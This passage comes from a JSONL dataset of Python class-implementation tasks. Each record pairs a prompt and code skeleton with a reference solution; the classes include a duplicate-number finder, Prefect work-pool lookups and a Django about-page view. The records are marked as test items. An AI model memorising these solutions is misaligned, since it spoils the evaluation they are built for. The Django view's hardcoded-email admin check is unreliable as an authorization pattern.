把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)", "name": "findRepeatNumber2", "signature": "def findRepeatNumber2(self, nums: List[int]) -> int"}, {"docstring": "第二种的改版 字典用set来存储", "name": "findRepeatNumber2_2", "signature": "def findRepeatNumber2_2(self, nums: List[int]) -> int"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findRepeatNumber(self, nums: List[int]) -> int: 第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\n- def findRepeatNumber2(self, nums: List[int]) -> int: 第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\n- def findRepeatNumber2_2(self, nums: List[int]) -> int: 第二种的改版 字典用set来存储", "prompted_full_text": "Implement the Python class `Solution` 
described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findRepeatNumber(self, nums: List[int]) -> int: 第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\n- def findRepeatNumber2(self, nums: List[int]) -> int: 第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\n- def findRepeatNumber2_2(self, nums: List[int]) -> int: 第二种的改版 字典用set来存储\n\n<|skeleton|>\nclass Solution:\n\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n <|body_0|>\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n <|body_1|>\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n<|end_body_0|>\n\n<|body_start_1|>\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n<|end_body_1|>\n\n<|body_start_2|>\n find_set = set()\n for num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n<|end_body_2|>\n", "revision_id": "c92a5ddcc56e3f69be1e6fb25e9c8ed277e57ee0", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n <|body_0|>\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n <|body_1|>\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n find_set = set()\n for num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n", "source": "the_stack_v2_python_sparse", "source_path": "SwordOffer/SwordOffer_03.py", "source_repo": "EachenKuang/LeetCode", "split": "test", "star_events_count": 28} {"blob_id": "597b1d2e98a7ec1dbf7cec6655f6169114c70831", "bodies": ["work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\nif not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\nreturn work_pool.id", "work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\nif not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\nreturn work_pool.default_queue_id", "work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\nif not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue 
'{work_pool_name}/{work_pool_queue_name}' not found.\")\nreturn work_pool_queue.id"], "bodies_text": "<|body_start_0|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n<|end_body_0|>\n\n<|body_start_1|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n<|end_body_1|>\n\n<|body_start_2|>\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n<|end_body_2|>\n", "class_docstring": "", "class_name": "WorkerLookups", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass WorkerLookups:\n\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_0|>\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_1|>\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n<|end_body_0|>\n\n<|body_start_1|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n<|end_body_1|>\n\n<|body_start_2|>\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000346", "length_bytes": 16683, "license_type": "permissive", "methods": [{"docstring": "Given a work pool name, return its ID. 
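The duplicate-finding record above carries Chinese docstrings; roughly: method 1 keeps an array where position n counts occurrences of n (somewhat wasteful on space), method 2 swaps the array for a dict (no up-front allocation, O(1) lookup), and method 2_2 is the same idea with a set. Note the dict/set variants fall through and return None when no duplicate exists, while method 1 returns -1. Since every value lies in [0, n-1], there is also a well-known O(1)-extra-space in-place-swap variant; the sketch shows the record's set approach plus that alternative (the in-place version is not in the record).

def find_repeat_number(nums):
    """Set-based variant from the record: O(n) time, O(n) extra space."""
    seen = set()
    for num in nums:
        if num in seen:
            return num
        seen.add(num)
    return None

def find_repeat_number_inplace(nums):
    """O(1)-space alternative: values are in [0, n-1], so keep swapping
    nums[i] toward index nums[i]; a clash while swapping is a duplicate.
    Mutates nums; returns -1 if no duplicate exists."""
    i = 0
    while i < len(nums):
        if nums[i] == i:
            i += 1
            continue
        j = nums[i]
        if nums[j] == j:        # index j already holds value j: duplicate
            return j
        nums[i], nums[j] = nums[j], nums[i]
    return -1

print(find_repeat_number([2, 3, 1, 0, 2, 5, 3]))          # 2
print(find_repeat_number_inplace([2, 3, 1, 0, 2, 5, 3]))  # 2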
Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "name": "_get_work_pool_id_from_name", "signature": "async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID"}, {"docstring": "Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "name": "_get_default_work_pool_queue_id_from_work_pool_name", "signature": "async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str)"}, {"docstring": "Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "name": "_get_work_pool_queue_id_from_name", "signature": "async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007170", "prompt": "Implement the Python class `WorkerLookups` described below.\n\nClass description:\nImplement the WorkerLookups class.\n\nMethod signatures and docstrings:\n- async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID: Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str): Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID: Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).", "prompted_full_text": "Implement the Python class `WorkerLookups` described below.\n\nClass description:\nImplement the WorkerLookups class.\n\nMethod signatures and docstrings:\n- async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID: Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str): Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n- async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID: Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\n\n<|skeleton|>\nclass WorkerLookups:\n\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. 
Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_0|>\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_1|>\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n<|end_body_0|>\n\n<|body_start_1|>\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n<|end_body_1|>\n\n<|body_start_2|>\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n<|end_body_2|>\n", "revision_id": "355d5de4b29720d9a81c12fd77ef734fc2c1733b", "skeleton": "<|skeleton|>\nclass WorkerLookups:\n\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_0|>\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_1|>\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class WorkerLookups:\n async def _get_work_pool_id_from_name(self, session: AsyncSession, work_pool_name: str) -> UUID:\n \"\"\"Given a work pool name, return its ID. 
Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.id\n\n async def _get_default_work_pool_queue_id_from_work_pool_name(self, session: AsyncSession, work_pool_name: str):\n \"\"\"Given a work pool name, return the ID of its default queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n work_pool = await models.workers.read_work_pool_by_name(session=session, work_pool_name=work_pool_name)\n if not work_pool:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Worker pool \"{work_pool_name}\" not found.')\n return work_pool.default_queue_id\n\n async def _get_work_pool_queue_id_from_name(self, session: AsyncSession, work_pool_name: str, work_pool_queue_name: str) -> UUID:\n \"\"\"Given a work pool name and work pool queue name, return the ID of the queue. Used for translating user-facing APIs (which are name-based) to internal ones (which are id-based).\"\"\"\n work_pool_queue = await models.workers.read_work_pool_queue_by_name(session=session, work_pool_name=work_pool_name, work_pool_queue_name=work_pool_queue_name)\n if not work_pool_queue:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"Worker queue '{work_pool_name}/{work_pool_queue_name}' not found.\")\n return work_pool_queue.id\n", "source": "the_stack_v2_python_sparse", "source_path": "src/prefect/orion/api/workers.py", "source_repo": "Clearcover/prefect", "split": "test", "star_events_count": 1} {"blob_id": "6cb4d0b6f841d67a1c2db122b373533917f7531b", "bodies": ["user_prof = UserProfile.objects.get(user=request.user)\ntry:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\nexcept ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))", "user_prof = UserProfile.objects.get(user=request.user)\nabout_person = AboutPerson.objects.get(slug=slug)\nform = AboutFunderForm(request.POST, request.FILES)\nif form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 
'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\nelse:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})"], "bodies_text": "<|body_start_0|>\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n<|end_body_0|>\n\n<|body_start_1|>\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n<|end_body_1|>\n", "class_docstring": "A class that represents the update page for an about page entry", "class_name": "AboutUpdateView", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AboutUpdateView:\n \"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n <|body_0|>\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. 
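The `WorkerLookups` record above is Prefect Orion's name-to-id translation layer: each helper reads by name through the models layer and converts a miss into an HTTP 404. A stripped-down, runnable sketch of the same shape follows, with the database session and FastAPI's HTTPException stubbed out; the pool data here is invented.

import asyncio
from uuid import UUID, uuid4

class NotFound(Exception):
    """Stand-in for fastapi.HTTPException(status_code=404, ...)."""

# Fake storage in place of the SQLAlchemy session + models layer.
_WORK_POOLS = {'default-pool': {'id': uuid4(), 'default_queue_id': uuid4()}}

async def read_work_pool_by_name(name):
    await asyncio.sleep(0)          # stands in for the real DB round-trip
    return _WORK_POOLS.get(name)

async def get_work_pool_id_from_name(name: str) -> UUID:
    pool = await read_work_pool_by_name(name)
    if not pool:
        raise NotFound(f'Worker pool "{name}" not found.')
    return pool['id']

print(asyncio.run(get_work_pool_id_from_name('default-pool')))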
:return: an http response that redirects to a new page if the entry update is successful\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n<|end_body_0|>\n\n<|body_start_1|>\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000347", "length_bytes": 11714, "license_type": "no_license", "methods": [{"docstring": "The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry", "name": "get", "signature": "def get(self, request, slug)"}, {"docstring": "The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful", "name": "post", "signature": "def post(self, request, slug)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002712", "prompt": "Implement the Python class `AboutUpdateView` described below.\n\nClass description:\nA class that represents the update page for an about page entry\n\nMethod signatures and docstrings:\n- def get(self, request, slug): The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\n- def post(self, request, slug): The post request for updating an existing entry on the about page. 
:return: an http response that redirects to a new page if the entry update is successful", "prompted_full_text": "Implement the Python class `AboutUpdateView` described below.\n\nClass description:\nA class that represents the update page for an about page entry\n\nMethod signatures and docstrings:\n- def get(self, request, slug): The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\n- def post(self, request, slug): The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\n\n<|skeleton|>\nclass AboutUpdateView:\n \"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n <|body_0|>\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n<|end_body_0|>\n\n<|body_start_1|>\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n<|end_body_1|>\n", "revision_id": "8296c49dfa8771b47965c24b6b49a2b6e8ace6cf", "skeleton": "<|skeleton|>\nclass AboutUpdateView:\n 
\"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n <|body_0|>\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. :return: an http response that redirects to a new page if the entry update is successful\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AboutUpdateView:\n \"\"\"A class that represents the update page for an about page entry\"\"\"\n\n def get(self, request, slug):\n \"\"\"The get request to view the update page for an entry on the about page :return: an http response showing the aboutPerson form for creating new about entry\"\"\"\n user_prof = UserProfile.objects.get(user=request.user)\n try:\n about_person = AboutPerson.objects.get(slug=str(slug))\n form = AboutFunderForm(initial={'name': about_person.name, 'content': about_person.content, 'image': about_person.image, 'funder_or_adviser': about_person.funder_or_adviser})\n user_prof = UserProfile.objects.get(user=request.user)\n if not user_prof.user.email == 'relevate@outlook.com':\n return HttpResponseRedirect(reverse('contribution:home'))\n return render(request, 'about_update.html', {'form': form, 'slug': slug, 'user_prof': user_prof, 'first_name': request.user.first_name, 'last_name': request.user.last_name})\n except ObjectDoesNotExist:\n return HttpResponseRedirect(reverse('contribution:about'))\n\n def post(self, request, slug):\n \"\"\"The post request for updating an existing entry on the about page. 
:return: an http response that redirects to a new page if the entry update is successful\"\"\"\n user_prof = UserProfile.objects.get(user=request.user)\n about_person = AboutPerson.objects.get(slug=slug)\n form = AboutFunderForm(request.POST, request.FILES)\n if form.is_valid():\n x = form.cleaned_data.get('x')\n y = form.cleaned_data.get('y')\n w = form.cleaned_data.get('width')\n h = form.cleaned_data.get('height')\n image = form.cleaned_data.get('image')\n if user_prof.user.email == 'relevate@outlook.com':\n about_person.name = form.cleaned_data['name']\n about_person.content = form.cleaned_data.get('content')\n about_person.funder_or_adviser = form.cleaned_data.get('funder_or_adviser')\n if image:\n photo = Image.open(form.cleaned_data.get('image'))\n cropped_image = photo.crop((x, y, w + x, h + y))\n filename, file_extension = os.path.splitext(os.path.basename(urlparse(about_person.image.url).path))\n cropped_image.save(settings.BASE_DIR + '/media/about_person/image/' + filename + file_extension)\n about_person.image = 'about_person/image/' + filename + file_extension\n about_person.save()\n messages.success(request, 'Funder or Advisor Was Successfully Added!')\n return HttpResponseRedirect(reverse_lazy('contribution:about'))\n else:\n return HttpResponseRedirect(reverse_lazy('contribution:home'))\n else:\n print('Invalid')\n display_error(form, request)\n return render(request, 'about_create.html', {'form': form, 'user_prof': user_prof})\n", "source": "the_stack_v2_python_sparse", "source_path": "relevate_web_app/apps/contribution/views/about_views.py", "source_repo": "jhock/Relevate", "split": "test", "star_events_count": 1} {"blob_id": "5505e0105bfe499a17204209f0bd67b21a8c79ab", "bodies": ["self.type = 'ATOM'\nself.serial = serial\nself.name = name\nself.altLoc = ''\nself.resName = resName\nself.chainID = ''\nself.resSeq = 1\nself.iCode = ''\nself.x = x\nself.y = y\nself.z = z\nself.occupancy = 0.0\nself.tempFactor = 0.0\nself.segID = ''\nself.element = ''\nself.charge = ''\nself.ffcharge = 0.0\nself.radius = 0.0\nself.intrabonds = []\nself.residue = None\nself.refdistance = None", "state = 0\nif self.name in BACKBONE:\n state = 1\nreturn state"], "bodies_text": "<|body_start_0|>\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n 